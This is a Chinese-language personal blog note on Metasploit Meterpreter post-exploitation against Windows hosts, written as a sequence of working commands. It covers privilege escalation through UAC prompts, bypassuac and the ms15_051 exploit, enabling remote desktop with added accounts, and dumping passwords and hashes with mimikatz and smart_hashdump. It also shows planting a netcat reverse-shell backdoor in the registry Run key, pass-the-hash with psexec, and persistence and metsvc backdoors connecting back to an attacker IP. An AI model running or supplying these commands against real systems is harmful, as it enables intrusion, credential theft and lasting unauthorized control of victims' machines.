meterpreter后渗透阶段的基本操作(一)

这里只是一个笔记,可能没有那么全面和有条理,都是自己遇到的一些问题

1、shell里的中文乱码

获得一个meterpreter shell之后,使用shell命令,显示中文时会出现乱码

解决方法:在输入shell之后,再输入chcp 65001

meterpreter后渗透阶段的基本操作(一)_第1张图片

2、提权相关的问题

getuid发现不是管理员权限,使用getsystem命令提权(不使用参数默认使用全部提权方法)会报错,不成功、

(提权方式:1、getsystem 2、系统内核漏洞提权 3、绕过UAC提权)

1)解决方法一:
我常使用exploit/windows/local/ask模块,该模块实际上只是以高权限重启一个返回式shellcode,并没有绕过UAC,会触发系统UAC,受害机器有提示,提示用户是否要运行,如果用户选择“yes”,就可以程序返回一个高权限meterpreter shell(需要执行getsystem)

meterpreter后渗透阶段的基本操作(一)_第2张图片
meterpreter后渗透阶段的基本操作(一)_第3张图片

meterpreter后渗透阶段的基本操作(一)_第4张图片

2)解决方法二:
绕过UAC提权,msf内置多个pypassuac脚本,运行后返回一个新的会话,需要再次执行getsystem获取系统权限

3)解决方法三:

在搜集资料时发现了一个更牛逼的模块,Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权

首先要获取目标主机的meterpreter会话,才能使用这个模块。而且在使用这个模块之前,我们需要先把当前的meterpreter会话放到后台运行(CTRL+Z)

现在我们获取到的meterpreter会话是3,执行下列命令:

use post/multi/recon/local_exploit_suggester
set LHOST 192.168.43.133
set SESSION 3
exploit

meterpreter后渗透阶段的基本操作(一)_第5张图片

这里我试了几个,有些可能不行(可能有误报或差别),选了一个exploit/windows/local/ms15_051_client_copy_image(打了几次才成功):

use exploit/windows/local/ms15_051_client_copy_image
set lhost 192.168.43.133
set session 3
exploit

meterpreter后渗透阶段的基本操作(一)_第6张图片

3、开启远程桌面

run getgui -e
run getgui -u zwish -p zwish
run getgui -f 6661 –e   #3389端口转发到6661

新开一个终端

rdesktop 127.0.0.1:6661

有时候也可以不用端口转发rdesktop ip:3389

如果使用run getgui -u 用户名 -p 密码 不能添加成功,可以试一下post/windows/manage/enable_rdp模块

但可能还是会报1332这个错,具体原因google了一下还是没有找到解决方案,解决了的dalao麻烦教教dd

4、抓取密码(hash)

mimikatz

load mimikatz    #help mimikatz 查看帮助
wdigest  #获取Wdigest密码
mimikatz_command -f samdump::hashes  #执行mimikatz原始命令
mimikatz_command -f sekurlsa::searchPasswords

meterpreter后渗透阶段的基本操作(一)_第7张图片

meterpreter后渗透阶段的基本操作(一)_第8张图片

5、注册表操作

1)注册表基本命令

reg –h
    -d   注册表中值的数据.    -k   注册表键路径    -v   注册表键名称
    enumkey 枚举可获得的键    setval 设置键值    queryval 查询键值数据

2)注册表设置nc后门

upload /usr/share/windows-binaries/nc.exe C:\windows\system32 #上传nc
reg enumkey -k HKLM\software\microsoft\windows\currentversion\run   #枚举run下的key
reg setval -k HKLM\software\microsoft\windows\currentversion\run -v lltest_nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe' #设置键值
reg queryval -k HKLM\software\microsoft\windows\currentversion\Run -v lltest_nc   #查看键值

nc -v 192.168.159.144 443  #攻击者连接nc后门

6、哈希利用

1)获取哈希

run post/windows/gather/smart_hashdump #从SAM导出密码哈希

需要SYSTEM权限

2)PSExec哈希传递

通过smart_hashdump获取用户哈希后,可以利用psexec模块进行哈希传递攻击

前提条件:①开启445端口 smb服务;②开启admin$共享

msf > use exploit/windows/smb/psexec
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 443
msf > set RHOST 192.168.159.144
msf >set SMBUser Administrator
msf >set SMBPass aad3b4*04ee:5b5f00*c424c
msf >set SMBDomain  WORKGROUP   #域用户需要设置SMBDomain
msf >exploit

7、持久化(后门植入)

metasploit自带的后门有两种方式启动的,一种是通过启动项启动(persistence),一种是通过服务启动(metsvc),另外还可以通过persistence_exe自定义后门文件。

1)persistence启动项后门

C:\Users***\AppData\Local\Temp\目录下,上传一个vbs脚本

在注册表HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项

run persistence –h #查看帮助

run persistence -X -i 5 -p 6661 -r 192.168.159.134

-X指定启动的方式为开机自启动,-i反向连接的时间间隔(5s) –r 指定攻击者的ip

连接后门

msf > use exploit/multi/handler
msf > set payload windows/meterpreter/reverse_tcp
msf > set LHOST 192.168.159.134
msf > set LPORT 6661
msf > exploit

2)metsvc服务后门

C:\Users***\AppData\Local\Temp\上传了三个文件(metsrv.x86.dll、metsvc-server.exe、metsvc.exe),通过服务启动,服务名为meterpreter

run metsvc –h # 查看帮助

run metsvc –A #自动安装后门

连接后门

msf > use exploit/multi/handler
msf > set payload windows/metsvc_bind_tcp
msf > set RHOST 192.168.159.144
msf > set LPORT 31337
msf > exploit

8、更多资料

后渗透之meterpreter使用攻略 :https://xz.aliyun.com/t/2536#toc-12

metasploit下Windows的多种提权方法:https://www.anquanke.com/post/id/85064

Windows内核提权 :https://xz.aliyun.com/t/2862?spm=5176.12901015.0.i12901015.4d6a525cRdiEq4&accounttraceid=471428ecdd3a42548b6f7408324904eagyth

你可能感兴趣的:(内网安全)